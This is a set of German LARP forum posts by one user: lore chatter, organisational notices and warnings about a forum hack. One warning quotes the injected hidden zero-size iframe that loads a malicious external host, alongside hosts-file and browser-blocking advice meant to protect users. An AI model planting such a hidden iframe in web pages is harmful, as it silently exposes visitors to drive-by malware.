Beiträge von Malglin

    Liebes Larp-Ahr Forum,


    die Daynon-Orga hat sich nach reiflicher Überlegung dazu entschlossen, das Forum zu verlassen. Es ist für uns aus organisatorischer Sicht ein notwendiger Schritt.


    Das bedeutet natürlich nicht, dass wir aus der Welt sind, wir werden euch auch weiterhin auf www.daynon.de über Veranstaltungen und Entwicklungen des Landes auf dem Laufenden halten! Außerdem bleiben wir mit unseren persönlichen Profilen auch weiterhin im Forum registriert. Wenn ihr also Kontakt aufnehmen möchtet, ist das sowohl über die Homepage als auch per pn möglich.


    Vielen Dank für viele Jahre guter Zusammenarbeit und auf ein baldiges Wiedersehen in Daynon!


    Eure Daynon Orga

    SL Anmerkung am Rande:


    Es gibt nicht "den" Lebenbaum, der Same ist ein Baumsame. Mal ganz egal, welche Wunderwirkung einzelne Leute reininterpretieren. Er stammt von einem seltenen Baum aus einen Elbenwald, der durch ein magisches Elementritual gewachsen ist.

    Zitat

    Original von Kahri
    :. schön geschrieben, das Forenpost... ansonsten weiterhin drauf sitzen bleiben, schlecht wird das Samenkorn nicht.
    .......


    Ashaba


    Es ist sicherlich nicht der Lebensbaum, das würde den ollen Kelten wohl ganz bitter aufstoßen und nachher haben wir eine Meute marodierender IT-Wicca vorm Zelt stehen... was er so allgemein kann hab ich ja schon geschrieben, genauere Angaben kann nur die IT-Familie Eldamar OT machen.


    Oder frag mal eine SL. "Eldamar ne Tawar" haben ich und Tobi von den Engoniern im Oktober 2002 geeselt.


    Der Lebensbaumsame ist ein Ableger des Baumes, den den Elben von Eldmar zur Erneuerung ihres Waldes unter Einbeziehung der 4 Elemente Feuer, Wasser, Luft und Erde gepflanzt haben. Es wurden damals 5 Samen an 5 Spieler verteilt. Inzwischen sind meines Wissens 3 von den 5 Samen "verbraucht" worden. Folglich existieren nur noch 2 Samen.


    Edit: Habe nachgeschaut, das Tear hat recht. Es waren nur 4 Samen, nicht 5. Habe Baumsame mit Blatt vom Lebensbaum verwechselt.
    11 Jahre sind doch eine lange Zeit. Dann bin ich mir nicht 100% sicher, ob Tears Samen der letzte der Samen ist.

    Aufgrund einer Serverattacke auf Apache-Server mit einem Iframe-Virus sind wir leider auch betroffen.


    Auf der umgeleiteten Zielseite kann versucht werden, Schadsoftware oder Kontrollsoftware auf den Benutzerrechner zu spielen. Als erste Hilfemaßnahme bitte ich alle Nutzer folgenden Maßnahmen zum Schutz der eigenen Rechner zu machen.


    Sperren der Seite im bevorzugten Explorer oder die Host-Datei auf dem eigenen Rechner ändern.


    Chrome
    1. AddOn Website Blocker installieren
    https://chrome.google.com/webs…gmbhdpfapmjadbaldib?hl=de
    2. esmtv.moon-galaxy.de als Webseite eintragen


    Firefox
    1. Addon BlockSite installieren
    https://addons.mozilla.org/de/firefox/addon/3145
    2. esmtv.moon-galaxy.de als Webseite eintragen


    Internet Explorer
    Bei dem Internet Explorer können nur Popups geblockt werden. Was man da auf jeden Fall unter dem Punkt Sicherheit deaktivieren sollte sind die ActiveX Scripte (Steuerelemente) !! Oben auf Extras-> Internetoptionen->Sicherheit->Stufe anpassen. Nicht nur wegen der Werbung, sondern weil man darüber einiges auf den Rechner einschleusen und ausführen kann, der die Seite besucht. Standardmässig dürfen ActiveX Plugins sogar ohne Nachfrage ausgeführt werden.
    Also vorerst deaktivieren!! Besser wäre es, IE vorerst nicht zu benutzen !!


    Weitere Informationen siehe auch
    Erste Hilfemaßnahmen wegen Serverattacke auf Larp-Ahr

    Achtung, du brauchst dafür Adminstratorrechte auf dem Rechner


    Die findest du in C:\Windows\System32\drivers\etc\


    Die Datei ist eine versteckte, also musst du dir über den Explorer -> Extras -> Ordneroptionen -> Ansicht -> 'Alle Dateien und Ordner anzeigen' auswählen, als auch 'Geschützte Systemdateien anzeigen'.
    In die hosts-Datei (ja, ohne Endung, einfach nur hosts) schreibst du mit dem Editor/Notepad


    127.0.0.1 http://esmtv.moon-galaxy.de


    Die IP Adresse 127.0.0.1 ist die lokale IP des Rechners und hat nichts mit IP Adressen im Netzwerk oder Internet zu tun. Auf die Art werden jetzt Zugriffe auf diese Seiten auf den Rechner (lokal) umgeleitet, wo der Browser natürlich keine Seite findet, also ist die Seite nicht erreichbar.

    Aufgrund einer Serverattacke auf Apache-Server mit einem Iframe-Virus sind wir leider auch betroffen.


    Auf der umgeleiteten Zielseite kann versucht werden, Schadsoftware oder Kontrollsoftware auf den Benutzerrechner zu spielen. Als erste Hilfemaßnahme bitte ich alle Nutzer folgenden Maßnahmen zum Schutz der eigenen Rechner zu machen.


    Sperren der Seite im bevorzugten Explorer oder die Host-Datei auf dem eigenen Rechner ändern.


    Chrome
    1. AddOn Website Blocker installieren
    https://chrome.google.com/webs…gmbhdpfapmjadbaldib?hl=de
    2. esmtv.moon-galaxy.de als Webseite eintragen


    Firefox
    1. Addon BlockSite installieren
    https://addons.mozilla.org/de/firefox/addon/3145
    2. esmtv.moon-galaxy.de als Webseite eintragen


    Internet Explorer
    Bei dem Internet Explorer können nur Popups geblockt werden. Was man da auf jeden Fall unter dem Punkt Sicherheit deaktivieren sollte sind die ActiveX Scripte (Steuerelemente) !! Oben auf Extras-> Internetoptionen->Sicherheit->Stufe anpassen. Nicht nur wegen der Werbung, sondern weil man darüber einiges auf den Rechner einschleusen und ausführen kann, der die Seite besucht. Standardmässig dürfen ActiveX Plugins sogar ohne Nachfrage ausgeführt werden.
    Also vorerst deaktivieren!! Besser wäre IE vorerst nicht zu benutzen !!

    Hallo liebe User,


    leider sind wir Opfer eines Hacks geworden.


    Der Code im Forum enthält ein Exploit
    <iframe src='http://esmtv.moon-galaxy.de/cache/templates/lib/?z' style='opacity: 0' width='0' height='0'></iframe>


    Wenn ich auf der Start-Seite bleibe und über 10 Minuten nichts mache, dann erfolgt eine Weiterleitung auf diese Webseite


    Es funktioniert nicht bei jeden anscheinend, tritt aber seit heute auf.


    Ich habe im Internet Ansätze gefunden, wie mit dem Problem umzugehen ist. Es müsste aber kurzfristig Zeit investiert werden, sollte das nicht möglich sein, müssen wir das Forum abschalten, da die Zielseite selber versucht, den Benutzerrechner mit schadhaften Code zu infizieren.


    Wir halten euch auf dem laufenden.


    Für das Team
    Malglin

    Die Larp-Ahr ist ein überregionales Projekt zur Schaffung einer Kommunikationsbasis im Internet für Larp-Veranstalter und Larp-Interessierte allgemein. Geographisch erstreckt sich das Schwerpunktgebiet dabei vom Landkreis Ahrweiler (und Umgebung) südostwärts bis in den Rhein-Neckar-Kreis (Heidelberg und Umgebung).


    In der Larp-Ahr-Community werden den Mitglied-Orgas eigene Intime-Bereiche (Intime = "Im Spiel") sowie abgeschlossene Planungs- und Diskussionsforen zur Verfügung gestellt. Zudem soll anderen Larp-Interessierten eine Plattform zum Austausch mit Gleichgesinnten geboten werden.


    Die betreibenden Mitglieder der Larp-Ahr sind zur Zeit:
    Sam Gamdschie e.V. (Dümpelfeld)
    LT Eifel e.V. (Euskirchen)
    Magonien e.V. (Heidelberg)

    Zitat

    Original von Moreta
    irgendwie haben wir in der Taverne gemerkt, dass ein paar Leute weniger da waren und ein paar bestimmte fehlten! ;)


    wir haben nichtmal ein Fass Bier geschafft...und ich hab mitgemacht! :rolleyes:


    Ein Fass war leer und die Hälfte des 20er ist vernichtet worden. Die Tavernenfront wurde bis 4.30 Uhr gehalten.